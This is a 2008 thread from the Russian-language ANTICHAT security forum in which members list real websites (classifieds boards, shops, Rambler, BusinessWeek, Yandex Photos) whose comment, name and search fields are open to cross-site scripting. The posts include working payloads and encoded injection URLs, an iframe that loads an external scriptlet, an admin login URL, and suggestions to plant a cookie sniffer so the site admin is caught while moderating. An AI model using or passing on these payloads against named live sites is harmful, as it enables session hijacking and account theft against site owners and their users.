ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 15.06.2008, 18:24
Лайт
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257

Репутация: 627
По умолчанию

Случайно нашел доску объявлений.
Уязвимы все комменты к товарам.
http://stolbik.kiev.ua/b5111492.html
А в поиске сидит пассивка:
_http://stolbik.kiev.ua/search_sp.php?text=%22%3E%3Cscript%3Ealert%28%27XS S+from+Light%27%29%3C%2Fscript%3E&group=0&search_b utt.x=28&search_butt.y=9

Последний раз редактировалось Лайт; 15.06.2008 в 18:28..
 

  #202  
Старый 15.06.2008, 19:26
Лайт
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257

Репутация: 627
По умолчанию

Вот еще: http://www.inox.ua/?check=guest_book&lt=1213543321953
Уязвимые поля: Имя, www, сообщение.
Частенько админ заглядывает в гостевую и коментит, можно его поймать)))
В поиске тоже сидит пассивка.

__________
Админ прикрыл посты без модерации, но XSS осталось, поэтому когда одмин будет просматривать, его можно накормить снифером...

Последний раз редактировалось Лайт; 16.06.2008 в 05:52.. Причина: админ прикрыл XSS, но не до конца
 

  #203  
Старый 16.06.2008, 05:45
Лайт
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257

Репутация: 627
По умолчанию

Вот какого зверя я нашел на этот раз: http://www.ilovedress.ru/catalogue/shops/?pid=168
уязвимым оказалось имя пользователя
ЗЫ Админка тоже на глаза попалась http://www.ilovedress.ru/admin/login.php

Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0

____________
Админ прикрыл гостевую, наверно фильтр поставит(((

Последний раз редактировалось Лайт; 16.06.2008 в 16:07.. Причина: Прикрыли XSS
 

  #204  
Старый 16.06.2008, 08:15
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

Цитата:
Я только не особо воткнул, что выскакивает по этой ссылке http://www.ilovedress.ru/catalogue/shops/?pid=0
хочешь удивиться ? ))) выскакивает alert(document.cookie)
просто в куках кроме id cессии не чего нет )
 

  #205  
Старый 16.06.2008, 14:44
Лайт
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257

Репутация: 627
По умолчанию

Цитата:
Сообщение от MaSTeR GэN  
хочешь удивиться ? ))) выскакивает alert(document.cookie)
просто в куках кроме id cессии не чего нет )
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail....08?add-comment
 

  #206  
Старый 16.06.2008, 15:52
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от Лайт  
Пасиба что растолковал, я примерно догадывался, но надо было по точнее узнать.

А вот мой утренний XSS, так сказать за завтраком.
http://www.iemag.ru/articles/detail....08?add-comment
хотелось секаса с девчиной, а получился xss "активный"(с)
 

  #207  
Старый 17.06.2008, 00:40
Лайт
Участник форума
Регистрация: 23.05.2007
Сообщений: 143
Провел на форуме:
2252257

Репутация: 627
По умолчанию

Вот моя вечерняя XSS, есть над чем поугарать, специально для самых внимательных.
http://www.tabacum.ru/showinfo.php?id=63
Поля: имя и коммент
 

  #208  
Старый 17.06.2008, 05:12
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

planeta.rambler.ru
Для теста создал два ака.
Создал в одном сообщество. (вот тут первая хцц)
в названии..
(что то типа бла бла бла //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT>)

мои настройки: премодерация- включена
участвуют все желающие
писатели- участники
читатели -участники сообщества
эксперты- назначает автор тобишь я

===========
Далее. назначаем эксперта нашего сообщества (пока себя самого) - + добавляем экспертные области опять же внедряем свой код
//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT> ( в приципе можно воспользоваться )
=================
теперь вторым аком заходим в наше сообщество и подаем заявку на вступление
=================
ну и попробуем добавить запись в наше сообщество
олерте
(ЗЫ акк чела должен быть в ваших друзьях)
=================
поиграйтесь с настройками, может я что то упустил
ъхэк!

Последний раз редактировалось xcedz; 17.06.2008 в 05:18..
 

  #209  
Старый 17.06.2008, 17:32
MaSTeR GэN
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110

Репутация: 133
Отправить сообщение для MaSTeR GэN с помощью ICQ
По умолчанию

businessweek.com
полезно иногда новости читать
постим коммент к новости
Код:
<iframe src=http://ha.ckers.org/scriptlet.html <
содержание scriptlet.html думаю сами понимаете ))
Код:
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
воврашаемся обратно по линку с новостью )) вуаля )
для примера вот news
http://www.businessweek.com/technology/content/jun2008/tc20080616_034849.htm?chan=technology_technology+i ndex+page_top+stories

P.S вся эта радость работает из за отображения последнего коммента во время поста нового но на странице где отображаються все комменты все нормально фильтруеться )

Последний раз редактировалось MaSTeR GэN; 17.06.2008 в 17:43..
 

  #210  
Старый 17.06.2008, 17:33
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

fotki.yandex.ru

уязвимо поле "Альбом". ничего не фильтруется.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ